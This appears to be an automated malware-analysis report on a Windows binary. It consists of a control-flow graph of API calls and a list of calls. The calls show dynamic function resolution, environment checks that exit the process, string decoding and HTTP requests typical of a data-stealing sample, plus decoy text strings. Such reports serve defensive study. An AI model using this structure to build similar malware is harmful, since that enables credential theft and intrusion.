26942 4045c0 34 API calls 26941->26942 26943 403415 26942->26943 26944 4045c0 34 API calls 26943->26944 26945 40342e 26944->26945 26946 4045c0 34 API calls 26945->26946 26947 403447 26946->26947 26948 4045c0 34 API calls 26947->26948 26949 403460 26948->26949 26950 4045c0 34 API calls 26949->26950 26951 403479 26950->26951 26952 4045c0 34 API calls 26951->26952 26953 403492 26952->26953 26954 4045c0 34 API calls 26953->26954 26955 4034ab 26954->26955 26956 4045c0 34 API calls 26955->26956 26957 4034c4 26956->26957 26958 4045c0 34 API calls 26957->26958 26959 4034dd 26958->26959 26960 4045c0 34 API calls 26959->26960 26961 4034f6 26960->26961 26962 4045c0 34 API calls 26961->26962 26963 40350f 26962->26963 26964 4045c0 34 API calls 26963->26964 26965 403528 26964->26965 26966 4045c0 34 API calls 26965->26966 26967 403541 26966->26967 26968 4045c0 34 API calls 26967->26968 26969 40355a 26968->26969 26970 4045c0 34 API calls 26969->26970 26971 403573 26970->26971 26972 4045c0 34 API calls 26971->26972 26973 40358c 26972->26973 26974 4045c0 34 API calls 26973->26974 26975 4035a5 26974->26975 26976 4045c0 34 API calls 26975->26976 26977 4035be 26976->26977 26978 4045c0 34 API calls 26977->26978 26979 4035d7 26978->26979 26980 4045c0 34 API calls 26979->26980 26981 4035f0 26980->26981 26982 4045c0 34 API calls 26981->26982 26983 403609 26982->26983 26984 4045c0 34 API calls 26983->26984 26985 403622 26984->26985 26986 4045c0 34 API calls 26985->26986 26987 40363b 26986->26987 26988 4045c0 34 API calls 26987->26988 26989 403654 26988->26989 26990 4045c0 34 API calls 26989->26990 26991 40366d 26990->26991 26992 4045c0 34 API calls 26991->26992 26993 403686 26992->26993 26994 4045c0 34 API calls 26993->26994 26995 40369f 26994->26995 26996 4045c0 34 API calls 26995->26996 26997 4036b8 26996->26997 26998 4045c0 34 API calls 26997->26998 26999 4036d1 26998->26999 27000 4045c0 34 API calls 26999->27000 27001 4036ea 27000->27001 27002 4045c0 34 API calls 27001->27002 27003 403703 27002->27003 27004 4045c0 34 API calls 27003->27004 27005 40371c 27004->27005 27006 4045c0 34 API calls 27005->27006 27007 403735 27006->27007 27008 4045c0 34 API calls 27007->27008 27009 40374e 27008->27009 27010 4045c0 34 API calls 27009->27010 27011 403767 27010->27011 27012 4045c0 34 API calls 27011->27012 27013 403780 27012->27013 27014 4045c0 34 API calls 27013->27014 27015 403799 27014->27015 27016 4045c0 34 API calls 27015->27016 27017 4037b2 27016->27017 27018 4045c0 34 API calls 27017->27018 27019 4037cb 27018->27019 27020 4045c0 34 API calls 27019->27020 27021 4037e4 27020->27021 27022 4045c0 34 API calls 27021->27022 27023 4037fd 27022->27023 27024 4045c0 34 API calls 27023->27024 27025 403816 27024->27025 27026 4045c0 34 API calls 27025->27026 27027 40382f 27026->27027 27028 4045c0 34 API calls 27027->27028 27029 403848 27028->27029 27030 4045c0 34 API calls 27029->27030 27031 403861 27030->27031 27032 4045c0 34 API calls 27031->27032 27033 40387a 27032->27033 27034 4045c0 34 API calls 27033->27034 27035 403893 27034->27035 27036 4045c0 34 API calls 27035->27036 27037 4038ac 27036->27037 27038 4045c0 34 API calls 27037->27038 27039 4038c5 27038->27039 27040 4045c0 34 API calls 27039->27040 27041 4038de 27040->27041 27042 4045c0 34 API calls 27041->27042 27043 4038f7 27042->27043 27044 4045c0 34 API calls 27043->27044 27045 403910 27044->27045 27046 4045c0 34 API calls 27045->27046 27047 403929 27046->27047 27048 4045c0 34 API calls 27047->27048 27049 403942 27048->27049 27050 4045c0 34 API calls 27049->27050 27051 40395b 27050->27051 27052 4045c0 34 API calls 27051->27052 27053 403974 27052->27053 27054 4045c0 34 API calls 27053->27054 27055 40398d 27054->27055 27056 4045c0 34 API calls 27055->27056 27057 4039a6 27056->27057 27058 4045c0 34 API calls 27057->27058 27059 4039bf 27058->27059 27060 4045c0 34 API calls 27059->27060 27061 4039d8 27060->27061 27062 4045c0 34 API calls 27061->27062 27063 4039f1 27062->27063 27064 4045c0 34 API calls 27063->27064 27065 403a0a 27064->27065 27066 4045c0 34 API calls 27065->27066 27067 403a23 27066->27067 27068 4045c0 34 API calls 27067->27068 27069 403a3c 27068->27069 27070 4045c0 34 API calls 27069->27070 27071 403a55 27070->27071 27072 4045c0 34 API calls 27071->27072 27073 403a6e 27072->27073 27074 4045c0 34 API calls 27073->27074 27075 403a87 27074->27075 27076 4045c0 34 API calls 27075->27076 27077 403aa0 27076->27077 27078 4045c0 34 API calls 27077->27078 27079 403ab9 27078->27079 27080 4045c0 34 API calls 27079->27080 27081 403ad2 27080->27081 27082 4045c0 34 API calls 27081->27082 27083 403aeb 27082->27083 27084 4045c0 34 API calls 27083->27084 27085 403b04 27084->27085 27086 4045c0 34 API calls 27085->27086 27087 403b1d 27086->27087 27088 4045c0 34 API calls 27087->27088 27089 403b36 27088->27089 27090 4045c0 34 API calls 27089->27090 27091 403b4f 27090->27091 27092 4045c0 34 API calls 27091->27092 27093 403b68 27092->27093 27094 4045c0 34 API calls 27093->27094 27095 403b81 27094->27095 27096 4045c0 34 API calls 27095->27096 27097 403b9a 27096->27097 27098 4045c0 34 API calls 27097->27098 27099 403bb3 27098->27099 27100 4045c0 34 API calls 27099->27100 27101 403bcc 27100->27101 27102 4045c0 34 API calls 27101->27102 27103 403be5 27102->27103 27104 4045c0 34 API calls 27103->27104 27105 403bfe 27104->27105 27106 4045c0 34 API calls 27105->27106 27107 403c17 27106->27107 27108 4045c0 34 API calls 27107->27108 27109 403c30 27108->27109 27110 4045c0 34 API calls 27109->27110 27111 403c49 27110->27111 27112 4045c0 34 API calls 27111->27112 27113 403c62 27112->27113 27114 4045c0 34 API calls 27113->27114 27115 403c7b 27114->27115 27116 4045c0 34 API calls 27115->27116 27117 403c94 27116->27117 27118 4045c0 34 API calls 27117->27118 27119 403cad 27118->27119 27120 4045c0 34 API calls 27119->27120 27121 403cc6 27120->27121 27122 4045c0 34 API calls 27121->27122 27123 403cdf 27122->27123 27124 4045c0 34 API calls 27123->27124 27125 403cf8 27124->27125 27126 4045c0 34 API calls 27125->27126 27127 403d11 27126->27127 27128 4045c0 34 API calls 27127->27128 27129 403d2a 27128->27129 27130 4045c0 34 API calls 27129->27130 27131 403d43 27130->27131 27132 4045c0 34 API calls 27131->27132 27133 403d5c 27132->27133 27134 4045c0 34 API calls 27133->27134 27135 403d75 27134->27135 27136 4045c0 34 API calls 27135->27136 27137 403d8e 27136->27137 27138 4045c0 34 API calls 27137->27138 27139 403da7 27138->27139 27140 4045c0 34 API calls 27139->27140 27141 403dc0 27140->27141 27142 4045c0 34 API calls 27141->27142 27143 403dd9 27142->27143 27144 4045c0 34 API calls 27143->27144 27145 403df2 27144->27145 27146 4045c0 34 API calls 27145->27146 27147 403e0b 27146->27147 27148 4045c0 34 API calls 27147->27148 27149 403e24 27148->27149 27150 4045c0 34 API calls 27149->27150 27151 403e3d 27150->27151 27152 4045c0 34 API calls 27151->27152 27153 403e56 27152->27153 27154 4045c0 34 API calls 27153->27154 27155 403e6f 27154->27155 27156 4045c0 34 API calls 27155->27156 27157 403e88 27156->27157 27158 4045c0 34 API calls 27157->27158 27159 403ea1 27158->27159 27160 4045c0 34 API calls 27159->27160 27161 403eba 27160->27161 27162 4045c0 34 API calls 27161->27162 27163 403ed3 27162->27163 27164 4045c0 34 API calls 27163->27164 27165 403eec 27164->27165 27166 4045c0 34 API calls 27165->27166 27167 403f05 27166->27167 27168 4045c0 34 API calls 27167->27168 27169 403f1e 27168->27169 27170 4045c0 34 API calls 27169->27170 27171 403f37 27170->27171 27172 4045c0 34 API calls 27171->27172 27173 403f50 27172->27173 27174 4045c0 34 API calls 27173->27174 27175 403f69 27174->27175 27176 4045c0 34 API calls 27175->27176 27177 403f82 27176->27177 27178 4045c0 34 API calls 27177->27178 27179 403f9b 27178->27179 27180 4045c0 34 API calls 27179->27180 27181 403fb4 27180->27181 27182 4045c0 34 API calls 27181->27182 27183 403fcd 27182->27183 27184 4045c0 34 API calls 27183->27184 27185 403fe6 27184->27185 27186 4045c0 34 API calls 27185->27186 27187 403fff 27186->27187 27188 4045c0 34 API calls 27187->27188 27189 404018 27188->27189 27190 4045c0 34 API calls 27189->27190 27191 404031 27190->27191 27192 4045c0 34 API calls 27191->27192 27193 40404a 27192->27193 27194 4045c0 34 API calls 27193->27194 27195 404063 27194->27195 27196 4045c0 34 API calls 27195->27196 27197 40407c 27196->27197 27198 4045c0 34 API calls 27197->27198 27199 404095 27198->27199 27200 4045c0 34 API calls 27199->27200 27201 4040ae 27200->27201 27202 4045c0 34 API calls 27201->27202 27203 4040c7 27202->27203 27204 4045c0 34 API calls 27203->27204 27205 4040e0 27204->27205 27206 4045c0 34 API calls 27205->27206 27207 4040f9 27206->27207 27208 4045c0 34 API calls 27207->27208 27209 404112 27208->27209 27210 4045c0 34 API calls 27209->27210 27211 40412b 27210->27211 27212 4045c0 34 API calls 27211->27212 27213 404144 27212->27213 27214 4045c0 34 API calls 27213->27214 27215 40415d 27214->27215 27216 4045c0 34 API calls 27215->27216 27217 404176 27216->27217 27218 4045c0 34 API calls 27217->27218 27219 40418f 27218->27219 27220 4045c0 34 API calls 27219->27220 27221 4041a8 27220->27221 27222 4045c0 34 API calls 27221->27222 27223 4041c1 27222->27223 27224 4045c0 34 API calls 27223->27224 27225 4041da 27224->27225 27226 4045c0 34 API calls 27225->27226 27227 4041f3 27226->27227 27228 4045c0 34 API calls 27227->27228 27229 40420c 27228->27229 27230 4045c0 34 API calls 27229->27230 27231 404225 27230->27231 27232 4045c0 34 API calls 27231->27232 27233 40423e 27232->27233 27234 4045c0 34 API calls 27233->27234 27235 404257 27234->27235 27236 4045c0 34 API calls 27235->27236 27237 404270 27236->27237 27238 4045c0 34 API calls 27237->27238 27239 404289 27238->27239 27240 4045c0 34 API calls 27239->27240 27241 4042a2 27240->27241 27242 4045c0 34 API calls 27241->27242 27243 4042bb 27242->27243 27244 4045c0 34 API calls 27243->27244 27245 4042d4 27244->27245 27246 4045c0 34 API calls 27245->27246 27247 4042ed 27246->27247 27248 4045c0 34 API calls 27247->27248 27249 404306 27248->27249 27250 4045c0 34 API calls 27249->27250 27251 40431f 27250->27251 27252 4045c0 34 API calls 27251->27252 27253 404338 27252->27253 27254 4045c0 34 API calls 27253->27254 27255 404351 27254->27255 27256 4045c0 34 API calls 27255->27256 27257 40436a 27256->27257 27258 4045c0 34 API calls 27257->27258 27259 404383 27258->27259 27260 4045c0 34 API calls 27259->27260 27261 40439c 27260->27261 27262 4045c0 34 API calls 27261->27262 27263 4043b5 27262->27263 27264 4045c0 34 API calls 27263->27264 27265 4043ce 27264->27265 27266 4045c0 34 API calls 27265->27266 27267 4043e7 27266->27267 27268 4045c0 34 API calls 27267->27268 27269 404400 27268->27269 27270 4045c0 34 API calls 27269->27270 27271 404419 27270->27271 27272 4045c0 34 API calls 27271->27272 27273 404432 27272->27273 27274 4045c0 34 API calls 27273->27274 27275 40444b 27274->27275 27276 4045c0 34 API calls 27275->27276 27277 404464 27276->27277 27278 4045c0 34 API calls 27277->27278 27279 40447d 27278->27279 27280 4045c0 34 API calls 27279->27280 27281 404496 27280->27281 27282 4045c0 34 API calls 27281->27282 27283 4044af 27282->27283 27284 4045c0 34 API calls 27283->27284 27285 4044c8 27284->27285 27286 4045c0 34 API calls 27285->27286 27287 4044e1 27286->27287 27288 4045c0 34 API calls 27287->27288 27289 4044fa 27288->27289 27290 4045c0 34 API calls 27289->27290 27291 404513 27290->27291 27292 4045c0 34 API calls 27291->27292 27293 40452c 27292->27293 27294 4045c0 34 API calls 27293->27294 27295 404545 27294->27295 27296 4045c0 34 API calls 27295->27296 27297 40455e 27296->27297 27298 4045c0 34 API calls 27297->27298 27299 404577 27298->27299 27300 4045c0 34 API calls 27299->27300 27301 404590 27300->27301 27302 4045c0 34 API calls 27301->27302 27303 4045a9 27302->27303 27304 419c10 27303->27304 27305 419c20 43 API calls 27304->27305 27306 41a036 8 API calls 27304->27306 27305->27306 27307 41a146 27306->27307 27308 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27306->27308 27309 41a153 8 API calls 27307->27309 27310 41a216 27307->27310 27308->27307 27309->27310 27311 41a298 27310->27311 27312 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27310->27312 27313 41a2a5 6 API calls 27311->27313 27314 41a337 27311->27314 27312->27311 27313->27314 27315 41a344 9 API calls 27314->27315 27316 41a41f 27314->27316 27315->27316 27317 41a4a2 27316->27317 27318 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27316->27318 27319 41a4ab GetProcAddress GetProcAddress 27317->27319 27320 41a4dc 27317->27320 27318->27317 27319->27320 27321 41a515 27320->27321 27322 41a4e5 GetProcAddress GetProcAddress 27320->27322 27323 41a612 27321->27323 27324 41a522 10 API calls 27321->27324 27322->27321 27325 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27323->27325 27326 41a67d 27323->27326 27324->27323 27325->27326 27327 41a686 GetProcAddress 27326->27327 27328 41a69e 27326->27328 27327->27328 27329 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27328->27329 27330 415ca3 27328->27330 27329->27330 27331 401590 27330->27331 27606 401670 27331->27606 27334 41a7a0 lstrcpy 27335 4015b5 27334->27335 27336 41a7a0 lstrcpy 27335->27336 27337 4015c7 27336->27337 27338 41a7a0 lstrcpy 27337->27338 27339 4015d9 27338->27339 27340 41a7a0 lstrcpy 27339->27340 27341 401663 27340->27341 27342 415510 27341->27342 27343 415521 27342->27343 27344 41a820 2 API calls 27343->27344 27345 41552e 27344->27345 27346 41a820 2 API calls 27345->27346 27347 41553b 27346->27347 27348 41a820 2 API calls 27347->27348 27349 415548 27348->27349 27350 41a740 lstrcpy 27349->27350 27351 415555 27350->27351 27352 41a740 lstrcpy 27351->27352 27353 415562 27352->27353 27354 41a740 lstrcpy 27353->27354 27355 41556f 27354->27355 27356 41a740 lstrcpy 27355->27356 27396 41557c 27356->27396 27357 415643 StrCmpCA 27357->27396 27358 4156a0 StrCmpCA 27359 4157dc 27358->27359 27358->27396 27360 41a8a0 lstrcpy 27359->27360 27361 4157e8 27360->27361 27362 41a820 2 API calls 27361->27362 27364 4157f6 27362->27364 27363 41a820 lstrlenA lstrcpy 27363->27396 27366 41a820 2 API calls 27364->27366 27365 415856 StrCmpCA 27367 415991 27365->27367 27365->27396 27371 415805 27366->27371 27370 41a8a0 lstrcpy 27367->27370 27368 41a740 lstrcpy 27368->27396 27369 41a8a0 lstrcpy 27369->27396 27372 41599d 27370->27372 27373 401670 lstrcpy 27371->27373 27374 41a820 2 API calls 27372->27374 27395 415811 27373->27395 27375 4159ab 27374->27375 27378 41a820 2 API calls 27375->27378 27376 415a0b StrCmpCA 27379 415a16 Sleep 27376->27379 27380 415a28 27376->27380 27377 41a7a0 lstrcpy 27377->27396 27381 4159ba 27378->27381 27379->27396 27382 41a8a0 lstrcpy 27380->27382 27384 401670 lstrcpy 27381->27384 27385 415a34 27382->27385 27383 401590 lstrcpy 27383->27396 27384->27395 27386 41a820 2 API calls 27385->27386 27387 415a43 27386->27387 27389 41a820 2 API calls 27387->27389 27388 4152c0 29 API calls 27388->27396 27390 415a52 27389->27390 27392 401670 lstrcpy 27390->27392 27391 41578a StrCmpCA 27391->27396 27392->27395 27393 41593f StrCmpCA 27393->27396 27394 4151f0 23 API calls 27394->27396 27395->26450 27396->27357 27396->27358 27396->27363 27396->27365 27396->27368 27396->27369 27396->27376 27396->27377 27396->27383 27396->27388 27396->27391 27396->27393 27396->27394 27398 417553 GetVolumeInformationA 27397->27398 27399 41754c 27397->27399 27401 417591 27398->27401 27399->27398 27400 4175fc GetProcessHeap HeapAlloc 27402 417619 27400->27402 27403 417628 wsprintfA 27400->27403 27401->27400 27404 41a740 lstrcpy 27402->27404 27405 41a740 lstrcpy 27403->27405 27406 415da7 27404->27406 27405->27406 27406->26471 27408 41a7a0 lstrcpy 27407->27408 27409 404899 27408->27409 27615 4047b0 27409->27615 27411 4048a5 27412 41a740 lstrcpy 27411->27412 27413 4048d7 27412->27413 27414 41a740 lstrcpy 27413->27414 27415 4048e4 27414->27415 27416 41a740 lstrcpy 27415->27416 27417 4048f1 27416->27417 27418 41a740 lstrcpy 27417->27418 27419 4048fe 27418->27419 27420 41a740 lstrcpy 27419->27420 27421 40490b InternetOpenA StrCmpCA 27420->27421 27422 404944 27421->27422 27423 404955 27422->27423 27424 404ecb InternetCloseHandle 27422->27424 27628 418b60 GetSystemTime lstrcpy lstrcpy 27423->27628 27426 404ee8 27424->27426 27623 409ac0 CryptStringToBinaryA 27426->27623 27427 404963 27629 41a920 lstrcpy lstrcpy lstrcatA 27427->27629 27430 404976 27432 41a8a0 lstrcpy 27430->27432 27438 40497f 27432->27438 27433 41a820 2 API calls 27434 404f05 27433->27434 27436 41a9b0 4 API calls 27434->27436 27435 404f27 codecvt 27440 41a7a0 lstrcpy 27435->27440 27437 404f1b 27436->27437 27439 41a8a0 lstrcpy 27437->27439 27441 41a9b0 4 API calls 27438->27441 27439->27435 27452 404f57 27440->27452 27442 4049a9 27441->27442 27443 41a8a0 lstrcpy 27442->27443 27444 4049b2 27443->27444 27445 41a9b0 4 API calls 27444->27445 27446 4049d1 27445->27446 27447 41a8a0 lstrcpy 27446->27447 27448 4049da 27447->27448 27630 41a920 lstrcpy lstrcpy lstrcatA 27448->27630 27450 4049f8 27451 41a8a0 lstrcpy 27450->27451 27453 404a01 27451->27453 27452->26474 27454 41a9b0 4 API calls 27453->27454 27455 404a20 27454->27455 27456 41a8a0 lstrcpy 27455->27456 27457 404a29 27456->27457 27458 41a9b0 4 API calls 27457->27458 27459 404a48 27458->27459 27460 41a8a0 lstrcpy 27459->27460 27461 404a51 27460->27461 27462 41a9b0 4 API calls 27461->27462 27463 404a7d 27462->27463 27631 41a920 lstrcpy lstrcpy lstrcatA 27463->27631 27465 404a84 27466 41a8a0 lstrcpy 27465->27466 27467 404a8d 27466->27467 27468 404aa3 InternetConnectA 27467->27468 27468->27424 27469 404ad3 HttpOpenRequestA 27468->27469 27471 404b28 27469->27471 27472 404ebe InternetCloseHandle 27469->27472 27473 41a9b0 4 API calls 27471->27473 27472->27424 27474 404b3c 27473->27474 27475 41a8a0 lstrcpy 27474->27475 27476 404b45 27475->27476 27632 41a920 lstrcpy lstrcpy lstrcatA 27476->27632 27478 404b63 27479 41a8a0 lstrcpy 27478->27479 27480 404b6c 27479->27480 27481 41a9b0 4 API calls 27480->27481 27482 404b8b 27481->27482 27483 41a8a0 lstrcpy 27482->27483 27484 404b94 27483->27484 27485 41a9b0 4 API calls 27484->27485 27486 404bb5 27485->27486 27487 41a8a0 lstrcpy 27486->27487 27488 404bbe 27487->27488 27489 41a9b0 4 API calls 27488->27489 27490 404bde 27489->27490 27491 41a8a0 lstrcpy 27490->27491 27492 404be7 27491->27492 27493 41a9b0 4 API calls 27492->27493 27494 404c06 27493->27494 27495 41a8a0 lstrcpy 27494->27495 27496 404c0f 27495->27496 27633 41a920 lstrcpy lstrcpy lstrcatA 27496->27633 27498 404c2d 27499 41a8a0 lstrcpy 27498->27499 27500 404c36 27499->27500 27501 41a9b0 4 API calls 27500->27501 27502 404c55 27501->27502 27503 41a8a0 lstrcpy 27502->27503 27504 404c5e 27503->27504 27505 41a9b0 4 API calls 27504->27505 27506 404c7d 27505->27506 27507 41a8a0 lstrcpy 27506->27507 27508 404c86 27507->27508 27634 41a920 lstrcpy lstrcpy lstrcatA 27508->27634 27510 404ca4 27511 41a8a0 lstrcpy 27510->27511 27512 404cad 27511->27512 27513 41a9b0 4 API calls 27512->27513 27514 404ccc 27513->27514 27515 41a8a0 lstrcpy 27514->27515 27516 404cd5 27515->27516 27517 41a9b0 4 API calls 27516->27517 27518 404cf6 27517->27518 27519 41a8a0 lstrcpy 27518->27519 27520 404cff 27519->27520 27521 41a9b0 4 API calls 27520->27521 27522 404d1f 27521->27522 27523 41a8a0 lstrcpy 27522->27523 27524 404d28 27523->27524 27525 41a9b0 4 API calls 27524->27525 27526 404d47 27525->27526 27527 41a8a0 lstrcpy 27526->27527 27528 404d50 27527->27528 27635 41a920 lstrcpy lstrcpy lstrcatA 27528->27635 27530 404d6e 27531 41a8a0 lstrcpy 27530->27531 27532 404d77 27531->27532 27533 41a740 lstrcpy 27532->27533 27534 404d92 27533->27534 27636 41a920 lstrcpy lstrcpy lstrcatA 27534->27636 27536 404db3 27637 41a920 lstrcpy lstrcpy lstrcatA 27536->27637 27538 404dba 27539 41a8a0 lstrcpy 27538->27539 27540 404dc6 27539->27540 27541 404de7 lstrlenA 27540->27541 27542 404dfa 27541->27542 27543 404e03 lstrlenA 27542->27543 27638 41aad0 27543->27638 27545 404e13 HttpSendRequestA 27546 404e32 InternetReadFile 27545->27546 27547 404e67 InternetCloseHandle 27546->27547 27552 404e5e 27546->27552 27549 41a800 27547->27549 27549->27472 27550 41a9b0 4 API calls 27550->27552 27551 41a8a0 lstrcpy 27551->27552 27552->27546 27552->27547 27552->27550 27552->27551 27643 41aad0 27553->27643 27555 4117c4 StrCmpCA 27556 4117d7 27555->27556 27557 4117cf ExitProcess 27555->27557 27558 4117e7 strtok_s 27556->27558 27572 4117f4 27558->27572 27559 4119c2 27559->26476 27560 41199e strtok_s 27560->27572 27561 4118ad StrCmpCA 27561->27572 27562 4118cf StrCmpCA 27562->27572 27563 4118f1 StrCmpCA 27563->27572 27564 411951 StrCmpCA 27564->27572 27565 411970 StrCmpCA 27565->27572 27566 411913 StrCmpCA 27566->27572 27567 411932 StrCmpCA 27567->27572 27568 41185d StrCmpCA 27568->27572 27569 41187f StrCmpCA 27569->27572 27570 41a820 2 API calls 27570->27560 27571 41a820 lstrlenA lstrcpy 27571->27572 27572->27559 27572->27560 27572->27561 27572->27562 27572->27563 27572->27564 27572->27565 27572->27566 27572->27567 27572->27568 27572->27569 27572->27570 27572->27571 27573->26482 27574->26484 27575->26490 27576->26492 27577->26498 27578->26500 27579->26504 27580->26508 27581->26512 27582->26518 27583->26520 27584->26524 27585->26538 27586->26542 27587->26541 27588->26537 27589->26541 27590->26559 27591->26544 27592->26546 27593->26550 27594->26555 27595->26556 27596->26562 27597->26570 27598->26572 27599->26594 27600->26599 27601->26598 27602->26595 27603->26598 27604->26608 27607 41a7a0 lstrcpy 27606->27607 27608 401683 27607->27608 27609 41a7a0 lstrcpy 27608->27609 27610 401695 27609->27610 27611 41a7a0 lstrcpy 27610->27611 27612 4016a7 27611->27612 27613 41a7a0 lstrcpy 27612->27613 27614 4015a3 27613->27614 27614->27334 27639 401030 27615->27639 27619 404838 lstrlenA 27642 41aad0 27619->27642 27621 404848 InternetCrackUrlA 27622 404867 27621->27622 27622->27411 27624 409af9 LocalAlloc 27623->27624 27625 404eee 27623->27625 27624->27625 27626 409b14 CryptStringToBinaryA 27624->27626 27625->27433 27625->27435 27626->27625 27627 409b39 LocalFree 27626->27627 27627->27625 27628->27427 27629->27430 27630->27450 27631->27465 27632->27478 27633->27498 27634->27510 27635->27530 27636->27536 27637->27538 27638->27545 27640 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27639->27640 27641 41aad0 27640->27641 27641->27619 27642->27621 27643->27555 27782 416ab1 880 API calls 27747 4069f3 7 API calls 27808 819b37 9 API calls 27715 821c35 110 API calls 27784 41cafe 219 API calls 5 library calls 27785 823b7d 91 API calls 2 library calls 27786 826a40 6 API calls 26215 401190 26222 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26215->26222 26217 40119e 26218 4011cc 26217->26218 26224 417850 GetProcessHeap HeapAlloc GetUserNameA 26217->26224 26220 4011b7 26220->26218 26221 4011c4 ExitProcess 26220->26221 26223 417939 26222->26223 26223->26217 26225 4178c3 26224->26225 26225->26220 27718 82140b strtok_s 27719 823823 6 API calls 27720 826c57 692 API calls 27749 826d18 646 API calls 27721 82102b StrCmpCA strtok_s lstrlen lstrcpy 27787 41ce9f 69 API calls __amsg_exit 27722 823823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 27723 4088a4 RaiseException task __CxxThrowException@8 27724 4180a5 GetProcessHeap HeapFree 27751 81fd67 152 API calls 27753 41b9b0 RtlUnwind 27789 82cd97 170 API calls 2 library calls 27790 82be78 162 API calls 2 library calls

                                                Control-flow Graph

                                                APIs
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                                • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                                • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                                • strlen.MSVCRT ref: 004046F0
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
